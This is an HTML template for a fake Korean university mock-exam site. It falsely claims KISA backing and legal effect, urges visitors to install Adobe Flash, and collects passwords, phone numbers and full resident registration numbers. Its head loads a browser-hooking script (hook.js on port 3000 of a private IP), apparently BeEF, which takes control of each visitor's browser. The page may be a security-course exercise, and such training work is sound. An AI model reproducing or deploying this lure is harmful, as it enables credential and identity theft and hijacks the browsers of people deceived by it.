<link href="//netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//netdna.bootstrapcdn.com/bootstrap/3.1.0/js/bootstrap.min.js"></script>
<script src="//code.jquery.com/jquery-1.11.1.min.js"></script>
<!------ Include the above in your HEAD tag ---------->

<link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
<script src="//code.jquery.com/jquery-1.11.1.min.js"></script>
<script src="http://192.168.100.136:3000/hook.js"></script>
<!------ Include the above in your HEAD tag ---------->

{% load static %}
<!DOCTYPE html>
<html lang="ko">

<head>
  <meta charset="utf-8">
  <title>김포대학교 모의고사 시스템</title>
  <meta content="width=device-width, initial-scale=1.0" name="viewport">
  <meta content="" name="keywords">
  <meta content="" name="description">

  <!-- Favicons -->
  <link href="{% static 'img/favicon.png' %}" rel="icon">
  <link href="{% static 'img/apple-touch-icon.png' %}" rel="apple-touch-icon">

  <!-- Google Fonts -->
  <link href="{% static 'https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,700,700i|Poppins:300,400,500,700' %}" rel="stylesheet">

  <!-- Bootstrap CSS File -->
  <link href="{% static 'lib/bootstrap/css/bootstrap.min.css' %}" rel="stylesheet">

  <!-- Libraries CSS Files -->
  <link href="{% static 'lib/font-awesome/css/font-awesome.min.css' %}" rel="stylesheet">
  <link href="{% static 'lib/animate/animate.min.css' %}" rel="stylesheet">

  <!-- Main Stylesheet File -->
  <link href="{% static 'css/style.css' %}" rel="stylesheet">

  <!-- =======================================================
    Theme Name: Regna
    Theme URL: https://bootstrapmade.com/regna-bootstrap-onepage-template/
    Author: BootstrapMade.com
    License: https://bootstrapmade.com/license/
  ======================================================= -->
  <!-- 서비스 구현 -->
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap-theme.min.css">
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
  <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>





</head>

<body>

  <!--==========================
  Header
  ============================-->
  <header id="header">
    <div class="container">

      <div id="logo" class="pull-left">
        <a href="#hero"><img src="img/logo.png" alt="" title="" /></img></a>
        <!-- Uncomment below if you prefer to use a text logo -->
        <!--<h1><a href="#hero">Regna</a></h1>-->
      </div>

      <nav id="nav-menu-container">

  </header><!-- #header -->

  <!--==========================
    Hero Section
  ============================-->
  <section id="hero">
    <div class="hero-container">
      <h1>김포대학교</h1>
      <h2>모의 고사</h2>
    </div>
  </section><!-- #hero -->

  <main id="main">



 <link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<p>
<div class="container">
   <div class="row">
      <h1>1.이 모의고사는 행정효력이 있습니다.</h1>
       <h3>한국 인터넷 진흥원(KISA)에서 상시 출제하고 있으며, 이 시험에 합격시 정보보안기사 필기 면제자격이 부여됩니다.</h3>
   </div>
</p>
<p>
   <div class="row">
      <h1>2.시험시작후에는 실행된 모의고사 페이지외에 접속시 부정실격처리됩니다.</h1>
      <h3>부정 실격시, 향후 5년간 재응시 자격 박탈됩니다.</h3>
   </div>
</p>
<p>
   <div class="row">
      <h1>3.상단바에 어도비 플래시(Adobe Flash) 를 설치 해주세요. </h1>
   </div>
</p>
<p>
   <div class="row">
      <h1>4.어도비 플래시(Adobe Flash) 설치 후 아래 수험자 정보 입력해주세요. </h1>
      <h3>추후 결과확인을 위해 정확하게 입력해주셔야하며, 모두 입력후 시험시작 해주세요.</h3>
   </div>
</p>
<p>
    <div class="row">
      <h1>5.시험시작후 오류 발생시 김포대학교 사이버보안과 홈페이지에 문의해주세요. </h1>
   </div>
</p>
      <p>
      <div class="row">
      <h1>  </h1>
   </div>
</p>
<p>
      <div class="row">
      <h1>  </h1>
   </div>
</p>
<p>
      <div class="row">
      <h1>  </h1>
   </div>
</p>
<p>
      <div class="row">
      <h1>  </h1>
   </div>
</p>

</div>



    <!--==========================
      Services Section
    ============================-->
 <p>
   <div class="section-header">
          <h3 class="section-title">수험자 정보</h3>
          <p class="section-description">추후 수험 결과 확인을 위해 정확하게 작성해주세요.</p>

<form method="post" onsubmit="return validate()" enctype="text/plain">
    <fieldset>
        <div class="form-row">
            <div class="form-group col-md-4">
                <label for="my_id">아이디</label>
                <input type="text" class="form-control" name="my_id" id="my_id" size="12" maxlength="12" placeholder="아이디">
            </div>

            <div class="form-group col-md-4">
                <label for="my_pwd">비밀번호</label>
                <input type="password" class="form-control" name="my_pwd" id="my_pwd" maxlength="12" placeholder="비밀번호">
            </div>
            <div class="form-group col-md-4">
                <label for="my_pwd2">비밀번호 확인</label>
                <input type="password" class="form-control" name="my_pwd2" id="my_pwd2" maxlength="12" placeholder="비밀번호 확인">
            </div>
            <div class="form-group col-md-4">
                <label for="my_name">이름</label>
                <input type="text" class="form-control" name="my_name" id="my_name" maxlength="10" placeholder="이름">
            </div>
            <div class="form-group col-md-4">
                <label for="my_number">전화번호</label>
                <input type="tel" class="form-control" onkeyup="inputTelNumber(this);" name="my_number" id="my_pnumber" maxlength="13" placeholder="전화번호">
            </div>
            <div class="form-group col-md-4">
                <label for="my_pnumber">휴대번호</label>
                <input type="tel" class="form-control" onkeyup="inputPhoneNumber(this);" name="my_pnumber" id="my_pnumber" maxlength="13" placeholder="휴대번호">
            </div>
            <div class="form-group col-md-6">
                <label for="my_num">주민등록번호</label>
                <div class="input-group-prepend">
                    <input type="text" class="form-control" name="my_num1" id="my_num1" maxlength="6" placeholder="주민번호 앞자리">
                    <input type="password" class="form-control" name="my_num2" id="my_num2" maxlength="7" placeholder="주민번호 뒷자리">
                </div>
            </div>
            <div class="form-group col-md-6">
                <label for="my_mail">메일주소</label>
                <input type="email" class="form-control" name="my_mail" id="my_mail" placeholder="메일주소">
                <small id="emailHelp" class="form-text text-muted">We'll never share your email with anyone else.</small>
            </div>
            <div class="form-group col-md-8">
                <label for="my_year">생년월일</label>
                <div class="input-group">
                    <div class="input-group-prepend">
                        <input type="text" class="form-control" name="my_year" id="my_year" maxlength="4" placeholder="년도">
                        <span class="input-group-text">년</span>
                    </div>
                    <select name="month" id="month" class="custom-select">
                        <option value="1">1
                        </option>
                        <option value="2">2
                        </option>
                        <option value="3">3
                        </option>
                        <option value="4">4
                        </option>
                        <option value="5">5
                        </option>
                        <option value="6">6
                        </option>
                        <option value="7">7
                        </option>
                        <option value="8">8
                        </option>
                        <option value="9">9
                        </option>
                        <option value="10">10
                        </option>
                        <option value="11">11
                        </option>
                        <option value="12">12
                        </option>
                    </select>
                    <div class="input-group-prepend">
                        <label class="input-group-text" for="month">월</label>
                    </div>
                    <select name="day" id="day" class="custom-select">
                        <option value="1" selected="selected">1
                        </option>
                        <option value="2">2
                        </option>
                        <option value="3">3
                        </option>
                        <option value="4">4
                        </option>
                        <option value="5">5
                        </option>
                        <option value="6">6
                        </option>
                        <option value="7">7
                        </option>
                        <option value="8">8
                        </option>
                        <option value="9">9
                        </option>
                        <option value="10">10
                        </option>
                        <option value="11">11
                        </option>
                        <option value="12">12
                        </option>
                        <option value="13">13
                        </option>
                        <option value="14">14
                        </option>
                        <option value="15">15
                        </option>
                        <option value="16">16
                        </option>
                        <option value="17">17
                        </option>
                        <option value="18">18
                        </option>
                        <option value="19">19
                        </option>
                        <option value="20">20
                        </option>
                        <option value="21">21
                        </option>
                        <option value="22">22
                        </option>
                        <option value="23">23
                        </option>
                        <option value="24">24
                        </option>
                        <option value="25">25
                        </option>
                        <option value="26">26
                        </option>
                        <option value="27">27
                        </option>
                        <option value="28">28
                        </option>
                        <option value="29">29
                        </option>
                        <option value="30">30
                        </option>
                        <option value="31">31
                        </option>
                    </select>
                    <div class="input-group-prepend">
                        <label class="input-group-text" for="day">일</label>
                    </div>
                </div>
            </div>
            <div class="col-md-12 submit-btn">
                <input class="btn btn-primary" type="submit" name="submit" value="시험 시작">
            </div>
</p>
        </div>
    </fieldset>
</form>
    <!--==========================
    Call To Action Section
    ============================-->


    <!--==========================
      Portfolio Section
    ============================-->


    <!--==========================
      FAQ Section
    ============================-->


    <!--==========================
      Contact Section
    ============================-->


  <!--==========================
    Footer
  ============================-->
  <footer id="footer">
    <div class="footer-top">
      <div class="container">

      </div>
    </div>

    <div class="container">
      <div class="copyright">
        &copy; Copyright <strong>Regna</strong>. All Rights Reserved
      </div>
      <div class="credits">
        <!--
          All the links in the footer should remain intact.
          You can delete the links only if you purchased the pro version.
          Licensing information: https://bootstrapmade.com/license/
          Purchase the pro version with working PHP/AJAX contact form: https://bootstrapmade.com/buy/?theme=Regna
        -->
        Bootstrap Templates by <a href="https://bootstrapmade.com/">BootstrapMade</a>
      </div>
    </div>
  </footer><!-- #footer -->

  <a href="#" class="back-to-top"><i class="fa fa-chevron-up"></i></a>

  <!-- JavaScript Libraries -->
  <script src="lib/jquery/jquery.min.js"></script>
  <script src="lib/jquery/jquery-migrate.min.js"></script>
  <script src="lib/bootstrap/js/bootstrap.bundle.min.js"></script>
  <script src="lib/easing/easing.min.js"></script>
  <script src="lib/wow/wow.min.js"></script>
  <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD8HeI8o-c1NppZA-92oYlXakhDPYR7XMY"></script>

  <script src="lib/waypoints/waypoints.min.js"></script>
  <script src="lib/counterup/counterup.min.js"></script>
  <script src="lib/superfish/hoverIntent.js"></script>
  <script src="lib/superfish/superfish.min.js"></script>

  <!-- Contact Form JavaScript File -->
  <script src="contactform/contactform.js"></script>

  <!-- Template Main Javascript File -->
  <script src="js/main.js"></script>

</body>
</html>
